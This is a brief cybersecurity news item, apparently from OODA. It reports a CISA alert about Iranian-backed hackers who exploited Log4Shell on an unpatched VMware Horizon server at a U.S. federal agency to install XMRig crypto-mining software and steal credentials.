Hackers backed by the Iranian regime broke into the network of a U.S. federal government agency and used that access to install cryptocurrency mining software, the Cybersecurity and Infrastructure Security Agency (CISA) said in an alert on Wednesday. Officials first noticed evidence of advanced persistent threat (APT) activity on the agency’s network in April of this year and determined that it had been compromised since at least February. The hackers exploited a vulnerability to install XMRig crypto mining software and compromise credentials in the network. CISA did not identify the compromised agency, but said that it was publishing the alert to “help network defenders detect and protect against related compromises.” The Iranian-backed hackers used the Log4Shell vulnerability in an unpatched VMware Horizon server, which was first identified last December. “CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities,” CISA said Wednesday.
About OODA Analyst
OODA is comprised of a unique team of international experts capable of providing advanced intelligence and analysis, strategy and planning support, risk and threat management, training, decision support, crisis response, and security services to global corporations and governments.